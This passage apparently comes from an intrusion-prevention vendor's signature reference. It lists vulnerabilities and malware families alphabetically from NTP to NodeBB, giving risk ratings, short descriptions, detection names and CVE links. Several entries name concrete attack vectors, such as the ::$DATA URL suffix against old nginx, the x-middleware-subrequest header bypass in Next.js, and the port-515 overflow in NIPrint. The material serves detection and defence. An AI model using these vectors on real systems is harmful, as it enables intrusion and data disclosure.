Description: A vulnerability in the ntp.org NTP daemon allows an attacker to aribtrarily overwrite files on the server.
Situation: NTP_UDP-Network-Time-Protocol-Daemon-Pidfile-Driftfile-Arbitrary-File-Overwrite
References:
CVE-2015-7703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703
Back to top

Network-Time-Protocol-Daemon-Read_Mru_List-Denial-Of-Service

About this vulnerability: A vulnerability in ntp.org NTP
Risk: Moderate
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Malfunction
Description: A denial of service condition can be caused by sending the ntp.org NTPD a crafted packet containing an improperly formatted control message.
Situation: NTP_UDP-Network-Time-Protocol-Daemon-Read_Mru_List-Denial-Of-Service
References:
CVE-2016-7434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7434
Back to top

Network-Time-Protocol-Ntpq-Decodearr-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in ntp.org NTP
Risk: High
First detected in: sgpkg-ips-1121-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in the monitoring and control program ntpq of Network Time Protocol daemon. The vulnerability is due to insufficient validation of an array returned by ntpd server. A remote attacker could exploit this vulnerability by sending a crafted NTP response to a target user. Successful exploitation could result in arbitrary code execution in the security context of the user.
Situation: NTP_UDP-Network-Time-Protocol-Ntpq-Decodearr-Stack-Based-Buffer-Overflow
References:
CVE-2018-7183
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7183
Back to top

New.Net-Toolbar

About this vulnerability: New.Net Internet Explorer Toolbar
Risk: Low
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: New.Net Toolbar
Type: Misconfiguration
Description: New.Net is a toolbar for Internet Explorer. Some organizations may consider this unwanted software.
Situation: HTTP_CSH-New.Net-Toolbar-Activity
Back to top

Newdotnet

About this vulnerability: NewDotNet
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NewDotNet
Type: Misconfiguration
Description: NewDotNet is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Newdotnet
Back to top

Newsdesk-Cgi-File-Disclosure

About this vulnerability: Newsdesk.cgi file disclosure vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: News Desk
Type: Input Validation
Description: News Desk 1.2 contains a vulnerable newsdesk.cgi script that can be exploited to view any file on the system and the contents of any directory on the system using the Web server privileges.
References:
CVE-2001-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0232
Back to top

NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow

About this vulnerability: A vulnerability in NewsGator FeedDemon
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NewsGator FeedDemon
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in NewsGator FeedDemon. The application fails to sanitize user supplied input leading to a buffer overflow condition. A successful exploitation may lead to code execution in the context of the current user.
Situation: HTTP_SS-NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow
File-TextId_NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow
References:
CVE-2009-0546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0546
BID-33630
http://www.securityfocus.com/bid/33630
OSVDB-51753
http://www.osvdb.org/51753
Back to top

Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927

About this vulnerability: A vulnerability in Next.js
Risk: High
First detected in: sgpkg-ips-1855-5242
Last changed: sgpkg-ips-1855-5242
Platform: Generic
Software: Vercel Next.js
Type: Malfunction
Description: A vulnerability in Next.js middleware allows bypassing authentication requirements via a crafted x-middleware-subrequest HTTP header.
Situation: HTTP_CSH-Next.js-Possible-Middleware-Security-Control-Bypass-CVE-2025-29927
HTTP_CSH-Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927
References:
CVE-2025-29927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29927
Back to top

Nexus-Repository-Manager-Java-EL-Injection

About this vulnerability: A vulnerability in Nexus Repository Manager
Risk: High
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Sonatype Nexus Repository Manager
Type: Input Validation
Description: There exists a vulnerability in Nexus Repository Manager, version 3.21.1 and before, which allows remote attackers to exexute arbitrary code by injecting arbitrary Java Expression Language (EL) expressions.
Situation: HTTP_CRL-Nexus-Repository-Manager-Java-EL-Injection
References:
CVE-2020-10199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10199
Back to top

NFS-utils-TCP-Connection-Termination-Denial-Of-Service

About this vulnerability: A vulnerability in Linux NFS Project nfs-utils
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: linux NFS utils
Type: Malfunction
Description: There is a vulnerability in the statd daemon of the nfs-utils package. The daemon does not correctly handle the exception condition of an unexpected connection termination. If an attacker can terminate a network connection to statd at a certain phase, it is possible to create a denial of service condition with the termination of the statd daemon. The loss of statd disables NFS lock recovery. Under some circumstances, this may affect access to files on NFS systems or the integrity of files on NFS systems. The vulnerable application will terminate unexpectedly in the event of a successful attack. As the affected daemon is a part of the Network File System (NFS), the NFS functionality will be affected as a result. The statd daemon is used by the lockd daemon for lock recovery. Without lock recovery, abnormal system termination may result in file locking issues as described in section 4.1 &quot;Technical Mechanisms&quot;. Note that file locking problems do not occur as a result of the termination of statd. A second condition is required. Namely, an NFS server or client, during the time after the crash of the statd daemon, continues to use the NFS file locking functionality. Subsequently, the server or client terminates unexpectedly while there are active file locks being used by the client (or clients in the case of a server termination).
Situation: Generic_CS-NFS-utils-TCP-Connection-Termination-Denial-Of-Service
References:
CVE-2004-1014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1014
BID-11785
http://www.securityfocus.com/bid/11785
Back to top

Nginx-0-Length-Headers-Leak-Denial-Of-Service

About this vulnerability: A vulnerability in nginx HTTP Server
Risk: High
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: nginx
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in Nginx. The vulnerability is due to resource exhaustion that occurs when an attacker sends a stream of headers with a 0-length header name and 0-length header value, optionally Huffman encoded into 1-byte or greater headers. A remote unauthenticated attacker can exploit this vulnerability by sending a flood of crafted HTTP2 HEADERS and/or CONTINUATION frames. Successful exploitation could cause a denial of service conditions on the target system.
Situation: HTTP_CSH-Nginx-0-Length-Headers-Leak-Denial-Of-Service
References:
CVE-2019-9516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9516
Back to top

Nginx-Chunked-Encoding-Buffer-Overflow

About this vulnerability: A vulnerability in nginx HTTP Server
Risk: High
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: nginx
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in Nginx. The vulnerability is due to insufficient validation of chunked-encoding HTTP requests in the ngx_http_parse_chunked() function. A remote attacker can exploit this vulnerability to execute arbitrary code in the context of the affected service. If code execution is unsuccessful, a denial of service condition may result.
Situation: HTTP_CCH-Apache-And-Nginx-Multiple-Chunked-Encoding-Vulnerabilities
References:
CVE-2013-2028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028
OSVDB-93037
http://www.osvdb.org/93037
Back to top

Nginx-Chunked-Transfer-Parsing-Denial-Of-Service

About this vulnerability: A vulnerability in nginx HTTP Server
Risk: High
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: nginx
Type: Input Validation
Description: An denial of service vulnerability exists in Nginx. The vulnerability is due to an error while parsing chunked transfer encoded request or response bodies inside ngx_http_parse_chunked(). A remote attacker can exploit this vulnerability by sending a malicious request or response to the vulnerable server to disclose worker process memory or cause a denial-of-service condition on the server.
Situation: HTTP_CCH-Apache-And-Nginx-Multiple-Chunked-Encoding-Vulnerabilities
HTTP_SCH-Microsoft-HTTP-Services-And-Nginx-Chunked-Encoding-Vulnerabilities
References:
CVE-2013-2070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2070
BID-59824
http://www.securityfocus.com/bid/59824
OSVDB-93282
http://www.osvdb.org/93282
Back to top

Nginx-DNS-Resolver-Denial-Of-Service

About this vulnerability: A vulnerability in nginx HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: nginx
Type: Malfunction
Description: A denial of service condition may be caused by exploiting a vulnerability in the nginx web server. A crafted DNS response may cause an invalid pointer dereference which causes the daemon to trust an untrusted response.
Situation: DNS-UDP_Nginx-DNS-Resolver-Denial-Of-Service
References:
CVE-2016-0742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0742
Back to top

Nginx-DNS-Resolver-Off-By-One-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Nginx DNS Resolver.
Risk: High
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Platform: Generic
Software: nginx
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability in Nginx DNS Resolver, HTTP Server 0.6.18 through 1.20.0, which allows remote attackers to cause a denial of service condition and likely execute remote code by sending specially crafted packets to the target server, due to an off-by-one error in the ngx_resolver_copy() function.
Situation: DNS-UDP_Nginx-DNS-Resolver-Off-By-One-Heap-Buffer-Overflow
References:
CVE-2021-23017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23017
Back to top

Nginx-Location-NTFS-Extended-Attributes-Security-Bypass

About this vulnerability: A vulnerability in nginx HTTP Server for Windows
Risk: Moderate
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: nginx
Type: Malfunction
Description: A security bypass vulnerability has been reported in Nginx. The vulnerability is due to an error when resources defined by the "location" directive are accessed via an HTTP request containing directory names with NTFS extended attributes. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to a vulnerable instance of Nginx. This can result in disclosure of sensitive information.
Situation: HTTP_CRL-Nginx-Location-NTFS-Extended-Attributes-Security-Bypass
References:
CVE-2011-4963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4963
OSVDB-84339
http://www.osvdb.org/84339
Back to top

Nginx-Remote-Source-Code-Disclosure

About this vulnerability: An Nginx Remote Source Code Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: nginx
Type: Insecure Configuration
Description: A vulnerability in Nginx, versions 0.8 before 0.8.40 and 0.7 before 0.7.66, which allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URL.
Situation: HTTP_CRL-Nginx-Remote-Source-Code-Disclosure
References:
CVE-2010-2263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2263
BID-40760
http://www.securityfocus.com/bid/40760
OSVDB-65531
http://www.osvdb.org/65531
Back to top

Nginx-Request-URI-Verification-Security-Bypass

About this vulnerability: A vulnerability in nginx HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: nginx
Type: Input Validation
Description: There is a security bypass vulnerability in Nginx. The vulnerability is caused by improper handling of unescaped space characters within URIs. A remote attacker can exploit this vulnerability to bypass security restrictions in certain configurations.
Situation: HTTP_CSU-Nginx-Request-URI-Verification-Security-Bypass
References:
CVE-2013-4547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4547
OSVDB-100015
http://www.osvdb.org/100015
Back to top

Nginx-Unit-Router-Process-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Nginx Unit
Risk: High
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: nginx
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability in Nginx Unit, versions 0.3 through 1.7, which allows remote attcakers to cause a denial of service condition, due to the insufficient validation of requests within the router process in the nxt_http_request.c file.
References:
CVE-2019-7401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7401
Back to top

Nginx-URI-Parsing-Buffer-Underflow

About this vulnerability: A vulnerability in nginx HTTP Server
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: nginx
Type: Buffer Overflow
Description: There is a remote buffer underflow vulnerability in nginx HTTP server. The vulnerability is due to an error when processing malicious HTTP requests. A remote attacker can exploit this vulnerability by sending an HTTP request containing a specially crafted URI to the target system. Successful exploitation of this vulnerability can lead to arbitrary code execution in the security context of the affected service. An unsuccessful code execution attempt can lead to abnormal termination of the vulnerable program.
Situation: HTTP_CSU-Nginx-URI-Parsing-Buffer-Underflow
References:
CVE-2009-2629
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2629
BID-36384
http://www.securityfocus.com/bid/36384
Back to top

NginxProxyManager-Proxy-Host-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in NginxProxyManager
Risk: Moderate
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1457-5242
Platform: Generic
Software: NginxProxyManager
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for NginxProxyManager. This vulnerability is due to improper input validation for Proxy Host domain names. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: File-Text_NginxProxyManager-Proxy-Host-Stored-Cross-Site-Scripting
References:
CVE-2022-28379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28379
Back to top

NgIRCd-Log-Resolver-Format-String-Vulnerability

About this vulnerability: Format string vulnerability in ngIRCd Log_Resolver function
Risk: High
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ngIRCd
Type: Buffer Overflow
Description: ngIRCd Internet Relay Chat (IRC) daemon contains a format string vulnerability in the Log_Resolver function. A remote attacker can exploit this vulnerability by sending a malicious response to the daemons AUTH/IDENT request, which may lead to the execution of arbitrary code on the server.
Situation: Generic_NgIRCd-Log-Resolver-Format-String-Vulnerability
References:
CVE-2005-0226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0226
BID-12434
http://www.securityfocus.com/bid/12434
OSVDB-13444
http://www.osvdb.org/13444
Back to top

Ngrbot

About this vulnerability: NGRBot
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: NGRBot is a worm that spreads through various messaging and social networking platforms. It uses IRC to send and receive commands and can be used to cause a denial of service attack.
Situation: Generic_CS-IRC-Ngrbot-Activity-Detected
Back to top

NI-Flexlogger-Flxproj-File-Parsedatavalueasxmlhierarchy-Insecure-Deserialization

About this vulnerability: A vulnerability in National Instruments FlexLogger
Risk: Moderate
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Platform: Generic
Software: National Instruments FlexLogger; National Instruments InstrumentStudio
Type: Input Validation
Description: Insecure deserialization of data in FLXPROJ files causes a vulnerability in NI FlexLogger. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_NI-Flexlogger-Flxproj-File-Parsedatavalueasxmlhierarchy-Insecure-Deserialization
References:
CVE-2024-4044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4044
Back to top

NightFury-Infection-Traffic

About this vulnerability: NightFury infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1378-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: NightFury infection traffic was detected.
Situation: Generic_TCP-NightFury-Infection-Traffic
Back to top

Nikto-Web-Vulnerability-Scanner

About this vulnerability: Nikto
Risk: Moderate
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Vulnerability Scanner
Description: Nikto is a vulnerability scanner designed to verify whether known vulnerabilities are found in webservers.
Situation: HTTP_CS-Put-Nikto-Test
HTTP_CSU-Upload.cgi-Detect
HTTP_CSU-Nikto-Ipconfig.exe-Scan-Detect
HTTP_CSU-Nikto-Scan-Detect
HTTP_CSH-Nikto-Scan-Detect-By-User-Agent
HTTP_CSH-w3af-Scan-Detect-By-User-Agent
Back to top

Nipper-Buffer-Overflow-CVE-2019-17424

About this vulnerability: An attempt to exploit a vulnerability in nipper-ng detected
Risk: High
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: nipper-ng
Type: Input Validation
Description: A stack-based buffer overflow in the processPrivilage() function in IOS/process-general.c in nipper-ng 0.11.10 allows remote attackers (serving firewall configuration files) to achieve remote code execution or denial-of-service (DoS) via a crafted file.
Situation: File-Binary_Nipper-Buffer-Overflow-CVE-2019-17424
References:
CVE-2019-17424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17424
Back to top

NIPrint-Lpd-Lpr-Server-BOF

About this vulnerability: Buffer overflow in NIPrint LPD-LPR Server
Risk: High
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Network Instruments NIPrint LPD-LPR Print Server
Type: Buffer Overflow
Description: NIPrint LPD-LPR Print Server is vulnerable to a buffer overflow. By sending 60 bytes to port 515, a remote attacker could overflow a buffer and possibly execute arbitrary code on the system.
Situation: Printer_NIPrint-Lpd-Lpr-Server-BOF-1
Printer_NIPrint-Lpd-Lpr-Server-BOF-2
Printer_NIPrint-Lpd-Lpr-Server-BOF-3
References:
CVE-2003-1141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1141
BID-8969
http://www.securityfocus.com/bid/8969
OSVDB-2774
http://www.osvdb.org/2774
Back to top

Nitol

About this vulnerability: Nitol
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Nitol is a Botnet used for generating Distributed Denial of Service (DDoS) attacks.
Situation: Generic_CS-Nitol-Activity
Back to top

Nitro-Pro-PDF-Iccbased-ColorSpace-Stroke-Color-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Nitro PDF Nitro Pro
Risk: Moderate
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Platform: Generic
Software: Nitro Pro PDF
Type: Buffer Overflow
Description: A heap-based overflow vulnerability has been reported in Nitro Pro PDF. The vulnerability occurs while processing an ICCBased ColorSpace from a PDF document. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim into opening specially crafted PDF files. Successful exploitation could result in out-of-bounds write on the heap which could lead to remote code execution within the context of the target user.
Situation: File-PDF_Nitro-Pro-PDF-Iccbased-ColorSpace-Stroke-Color-Heap-Based-Buffer-Overflow
References:
CVE-2020-6146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6146
Back to top

Nitro-Pro-PDF-Indexed-ColorSpace-Integer-Overflow

About this vulnerability: A vulnerability in Nitro Pro PDF
Risk: High
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Nitro Pro PDF
Type: Integer Overflow
Description: There exists a vulnerability in Nitro Pro PDF, versions 13.22.0.414 and before, which allows remote attackers to execute arbitrary code by sending a specially crafted PDF file, due to an integer overflow vulnerability that occurs while processing an Indexed ColorSpace from a PDF document, causing an out-of-bounds write and memory corruption.
Situation: File-PDF_Nitro-Pro-PDF-Indexed-ColorSpace-Integer-Overflow
References:
CVE-2020-6116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6116
Back to top

Nitro-Pro-PDF-Nested-Pages-Use-After-Free

About this vulnerability: A vulnerability in Nitro PDF Nitro Pro
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nitro Pro PDF
Type: Malfunction
Description: An use-after-free vulnerability has been reported in Nitro Pro PDF. This vulnerability is due to improper handling of page objects. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.
Situation: File-PDF_Nitro-Pro-PDF-Nested-Pages-Use-After-Free
References:
CVE-2020-6074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6074
Back to top

Nitro-Pro-PDF-Object-Stream-Parsing-Number-Of-Objects-Integer-Overflow

About this vulnerability: A vulnerability in Nitro PDF Nitro Pro
Risk: Moderate
First detected in: sgpkg-ips-1289-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nitro Pro PDF
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in Nitro Pro PDF. The vulnerability occurs while processing an object stream from a PDF document. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim into opening specially crafted PDF files. Successful exploitation could result in out-of-bounds read and memory corruption which could lead to remote code execution within the context of the target user.
Situation: File-PDF_Nitro-Pro-PDF-Object-Stream-Parsing-Number-Of-Objects-Integer-Overflow
References:
CVE-2020-6113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6113
Back to top

Nitro-Pro-PDF-Pattern-Object-Integer-Overflow

About this vulnerability: A vulnerability in Nitro PDF Nitro Pro
Risk: Moderate
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nitro Pro PDF
Type: Integer Overflow
Description: Improper handling of a BBox property in a Pattern object causes an integer overflow vulnerability in Nitro Pro PDF. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the affected program.
Situation: File-PDF_Nitro-Pro-PDF-Pattern-Object-Integer-Overflow
References:
CVE-2020-6092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6092
Back to top

Nitro-Stealer-Infection-Traffic

About this vulnerability: Nitro Stealer infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Nitro Stealer infection traffic was detected.
Situation: HTTP_CRL-Nitro-Stealer-Infection-Traffic
Back to top

NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in NJStar Communicator's MiniSMTP Server detected
Risk: High
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NJStar Communicator MiniSMTP
Type: Buffer Overflow
Description: A Buffer Overflow vulnerability in NJStar Communicator 3.0, within MiniSMTP server, which allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.
Situation: SMTP_CS-NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow
Generic_CS-NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow
References:
CVE-2011-4040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4040
OSVDB-76728
http://www.osvdb.org/76728
Back to top

NLnet-Labs-Unbound-Notify-Queries-Denial-Of-Service

About this vulnerability: A vulnerability in NLnet Labs Unbound
Risk: High
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Platform: Generic
Software: NLnet Unbound
Type: Malfunction
Description: A denial-of-service vulnerability has been reported in Unbound DNS server. The vulnerability is due to the use of uninitialized stack variables when processing certain NOTIFY queries. A remote attacker could exploit this vulnerability by providing a crafted response to a vulnerable server. Successful exploitation leads to a denial-of-service condition.
Situation: DNS-UDP_NLnet-Labs-Unbound-Notify-Queries-Denial-Of-Service
References:
CVE-2019-16866
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16866
Back to top

NMAP-Web-Scanning-Activity

About this vulnerability: Nmap network scanner's activities detected
Risk: High
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1826-5242
Platform: Generic
Software: Nmap
Type: Input Validation
Description: Nmap is a popular network scanner that is used for host discovery and service and operating system detection. This fingerprint detects Nmap's web scanning activities.
Situation: HTTP_CSU-NMAP-Web-Scanning-Activity
HTTP_CSH-NMAP-Web-Scanning-Activity
Back to top

NNTP-Cassandra-Nntpserver-BOF

About this vulnerability: Cassandra NNTP Server denial of service
Risk: Moderate
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Atrium Software Cassandra NNTP Server
Type: Buffer Overflow
Description: Cassandra NNTP Server contains a buffer overflow vulnerability, that allows remote users to cause a denial-of-service attack. The buffer overflow happens when a login name of over 10,000 characters is encountered.
Situation: NNTP_Cassandra-Server-Login-Denial-Of-Service
References:
CVE-2000-0341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0341
BID-1156
http://www.securityfocus.com/bid/1156
Back to top

NNTP-Outlook-Express-List-Command-Response-Buffer-Overflow

About this vulnerability: Outlook Express fails to parse responses to the LIST command safely
Risk: High
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook Express
Type: Buffer Overflow
Description: Microsoft Outlook Express does not safely parse long replies to a NNTP list command, leading to a buffer overflow. The vulnerability allows a malicious server to execute arbitrary code on any Outlook Express clients requesting a list of newsgroups. User action is required to exploit the vulnerability, but many versions of Windows use Outlook Express as the default handler for a "news://" URI which makes it easier to trick victims to connect to a malicious server.
Situation: NNTP_Outlook-Express-List-Command-Response-Buffer-Overflow
References:
CVE-2005-1213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1213
BID-13951
http://www.securityfocus.com/bid/13951
MS05-030
http://technet.microsoft.com/security/bulletin/MS05-030
Back to top

NodCMS-Edit_Lang_File-PHP-Code-Execution

About this vulnerability: A vulnerability in NodCMS
Risk: Moderate
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NodCMS
Type: Malfunction
Description: A command injection vulnerability in NodCMS.
Situation: HTTP_CRL-NodCMS-Edit_Lang_File-PHP-Code-Execution
Back to top

Node.js-Foundation-Node.js-TLS-Denial-Of-Service

About this vulnerability: A vulnerability in Node.js
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Node.js
Type: Malfunction
Description: A denial of service vulnerability has been reported in Node.js. The vulnerability is due to improper handling of TLS by the node process. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted message to the target server during a TLS handshake. Successful exploitation would result in the target system abnormally terminating.
Situation: HTTPS_CS-Node.js-Foundation-Node.js-TLS-Denial-Of-Service
References:
CVE-2018-7162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7162
Back to top

Node.js-Foundation-Node.js-Zlib-Windowbits-Denial-Of-Service

About this vulnerability: A vulnerability in Node.js Node.js
Risk: Moderate
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Node.js
Type: Malfunction
Description: There has been reported a denial of service vulnerability in Node.js. Newer versions of zlib don't allow a value of 8 for windowBits, which leads to crashes. By sending a specially crafted WebSocket client requests to a target server, a remote attacker can cause a denial of service state in a target system.
Situation: HTTP_CS-Node.js-Foundation-Node.js-Zlib-Windowbits-Denial-Of-Service
References:
CVE-2017-14919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14919
Back to top

Node.js-Llhttp-Module-Transfer-Encoding-Handling-HTTP-Request-Smuggling

About this vulnerability: A vulnerability in Node.js
Risk: High
First detected in: sgpkg-ips-1493-5242
Last changed: sgpkg-ips-1493-5242
Platform: Generic
Software: Node.js
Type: Input Validation
Description: An HTTP request smuggling vulnerability has been reported in Node.js. The vulnerability is due to improper input validation of Transfer-Encoding headers in incoming HTTP requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in access to confidential information, passwords and session cookies. In the worst case an attacker could impersonate valid users and gain unrestricted access to the system.
Situation: HTTP_CSH-Node.js-Llhttp-Module-Transfer-Encoding-Handling-HTTP-Request-Smuggling
References:
CVE-2022-32213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32213
Back to top

Node.js-Systeminformation-Library-Command-Injection-CVE-2021-21315

About this vulnerability: An attempt to exploit a vulnerability in Node.js systeminformation library
Risk: High
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Platform: Generic
Software: Node.js
Type: Code Injection
Description: There has been reported a command injection vulnerability in the systeminformation library for Node.js.
Situation: HTTP_CSU-Node.js-Systeminformation-Library-Command-Injection-CVE-2021-21315
References:
CVE-2021-21315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21315
Back to top

NodeBB-Socket.io-Elevation-Of-Privilege

About this vulnerability: A vulnerability in NodeBB
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Generic
Software: NodeBB
Type: Input Validation
Description: An elevation of privilege vulnerability has been reported in NodeBB. The vulnerability is due to insufficient validation of messages sent to the socket.io module. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in elevation of privilege.
Situation: File-Text_NodeBB-Socket.io-Elevation-Of-Privilege
WebSocket_CS-NodeBB-Socket.io-Elevation-Of-Privilege
References:
CVE-2022-46164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46164
